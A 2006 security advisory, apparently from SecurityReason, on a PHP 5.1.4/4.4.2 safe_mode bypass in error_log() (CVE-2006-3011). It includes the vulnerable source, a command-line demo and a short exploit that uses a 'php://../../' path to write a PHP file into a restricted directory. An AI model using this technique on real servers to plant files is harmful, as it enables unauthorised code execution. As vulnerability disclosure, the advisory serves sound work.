error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2

Advisory Content :

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 10.6.2006
- -Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of
the PHP Conference Material is freely available.
error_log -- Send an error message somewhere.

- --- 1. error_log() Safe Mode Bypass ---
error_log() function send to email, file or display your error message. You
can send error messages per mail or write into files. Issue is very simple.
error_log() check safe_mode and open_basedir in stream function. But isn't
allowed use URL. And problem exists in incorrect filename.

PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char
*headers TSRMLS_DC)
{
php_stream *stream = NULL;

switch (opt_err) {

case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message", message, headers, NULL
TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not
available!");
return FAILURE;
#endif
}
break;

case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not
available!");
return FAILURE;
break;

case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL |
ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;

default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}
- -2013-2050---

Let's see to option 3.

- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE |
REPORT_ERRORS, NULL);
- -2038 line---

Option "a", writte to file error or if file dosen't exists, create new
file.
Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".
IGNORE_URL turn off safe_mode if you use "prefix://../../".

- -Example---
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect. The script whose
uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line
code on line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid
argument in Command line code on line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3,
"php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
- -Example---

- --- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>

- --- 3. How to fix ---
No response from PHP Team. We have reported this bug in 11.06.2006

- --- 4. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps
qXoX8VYnwFBa2VmK3zlxpGs=
=VAkg
-----END PGP SIGNATURE-----

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2